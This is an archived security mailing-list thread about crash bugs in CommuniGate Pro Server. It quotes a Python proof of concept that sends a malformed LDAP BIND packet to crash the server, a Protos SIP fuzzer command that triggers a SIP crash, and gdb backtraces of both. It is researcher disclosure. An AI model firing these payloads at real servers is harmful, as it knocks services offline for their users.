Dailydave mailing list archives
Re: Proof of concept for CommuniGate Pro Server vulnerability
From: "Evgeny Legerov" <research () gleg 7 com1 ru>
Date: Wed, 01 Feb 2006 02:54:19 +0300
Hi all,
"KF (lists)" <kf_lists () digitalmunition com> wrote:An SIP issue that was not reported or disclosed was also fixed in the same update. The issue is detailed below. You can easily trigger this issue with the Protos SIP toolset.StarGate:~# java -jar c07-sip-r2.jar -touri kfinisterre@192.168.0.35 -single 2361Log file snippet:Dec 9 16:18:14 localhost CommuniGatePro: CommuniGate Pro Server 5.0.3 started Dec 9 16:20:35 localhost CommuniGatePro: Exception signal: 11, trying to recover Dec 9 16:20:35 localhost CommuniGatePro: Exception in <STThread 87394E8 UDPReceiver 5060> Dec 9 16:21:07 localhost CommuniGatePro: CommuniGate Pro Server 5.0.3 started Dec 9 16:21:33 localhost CommuniGatePro: Exception signal: 11, trying to recover Dec 9 16:21:33 localhost CommuniGatePro: Exception in <STThread 8738B60 UDPReceiver 5060>0x4010e3ac in memmove () from /lib/libc.so.6 (gdb) i r eax 0xffffffe0 -32 ecx 0x1 1 edx 0xffffffe1 -31 ebx 0x8699758 141137752 esp 0xbabff670 0xbabff670 ebp 0xbabff678 0xbabff678 esi 0x868eeae 141094574 edi 0xffffffe0 -32 eip 0x4010e3ac 0x4010e3ac (gdb) x/i $pc0x4010e3ac <memmove+92>: repz movsb %ds:(%esi),%es:(%edi)(gdb) bt #0 0x4010e3ac in memmove () from /lib/libc.so.6 #1 0x0836cdac in SBMutableData::setBytes () #2 0x08280964 in VSIPPacket::parseFields () #3 0x0827f8da in VSIPPacket::parseData () #4 0x0827c8e8 in VSIP::processReadPacket () #5 0x0827ce83 in VSIP::processUDPRequest () #6 0x081bfeb1 in VUDPListener::receiver () #7 0x081bfa71 in VUDPListener::receiverStarter () #8 0x0838ad1d in STThreadStarter ()#9 0x4002af4c in pthread_start_thread () from /lib/libpthread.so.0 #10 0x4002afda in pthread_start_thread_event () from /lib/libpthread.so.0#11 0x4015f92a in clone () from /lib/libc.so.6
Looks interesting, thanks for the info.Upcoming 5.0.8 version of CommuniGate should have fixes for at least two different LDAP bugs (found with ProtoVer LDAP 1.4)
-KF Evgeny Legerov wrote:Hi,The simple code below can be used to reproduce one of CommuniGate 5.0.6 LDAP vulnerabilities (http://www.gleg.net/cg_advisory.txt)#!/usr/bin/env python # Use this code at your own risk. # It may crash your server! # Author: Evgeny Legerov import sys import socket HELP=""" CommuniGate Pro 5.0.6 vulnerability. Found with ProtoVer LDAP testsuite v1.1 Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -1389495376 (LWP 20235)] 0xada99bbc in memcpy () from /lib/libc.so.6 (gdb) backtrace #0 0xada99bbc in memcpy () from /lib/libc.so.6 #1 0x083924b8 in STCopyCString () #2 0x08349d5b in BERPackedData::makeCString () #3 0x081ae71a in VLDAPInput::processBINDrequest () #4 0x081af747 in VLDAPInput::processInput () #5 0x082c9373 in VStream::worker () #6 0x082ca1e9 in VStream::starter () #7 0x08399e7d in STThreadStarter ()#8 0xadb8bb80 in start_thread () from /lib/libpthread.so.0#9 0xadaf8dee in clone () from /lib/libc.so.6 (gdb) x/i $eip 0xada99bbc <memcpy+28>: repz movsl %ds:(%esi),%es:(%edi) (gdb) info regi esi edi ecx esi 0x8688961 141068641 edi 0x86c6fff 141324287 ecx 0x3fff7eae 1073708718 """ print HELP host="localhost" port=389 sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((host,port))s = "\x30\x12\x02\x01\x01\x60\x0d\x02\x01\x03\x04\x02\x44\x4e\x80"s += "\x84\xff\xff\xff\xff" sock.sendall(s) sock.close() 1+1=2
Regards, Evgeny Legerov
Current thread:
- Proof of concept for CommuniGate Pro Server vulnerability Evgeny Legerov (Jan 31)
- Re: Proof of concept for CommuniGate Pro Server vulnerability KF (lists) (Jan 31)
- Re: Proof of concept for CommuniGate Pro Server vulnerability Evgeny Legerov (Jan 31)
- Re: Proof of concept for CommuniGate Pro Server vulnerability Dave Aitel (Feb 01)
- Commercial Fuzzers RaMatkal (Feb 15)
- Re: Commercial Fuzzers Dave Aitel (Feb 15)
- Re: Commercial Fuzzers Matt Hargett (Feb 15)
- Re: Commercial Fuzzers Gadi Evron (Feb 15)
- Re: Proof of concept for CommuniGate Pro Server vulnerability Evgeny Legerov (Jan 31)
- Re: Proof of concept for CommuniGate Pro Server vulnerability KF (lists) (Jan 31)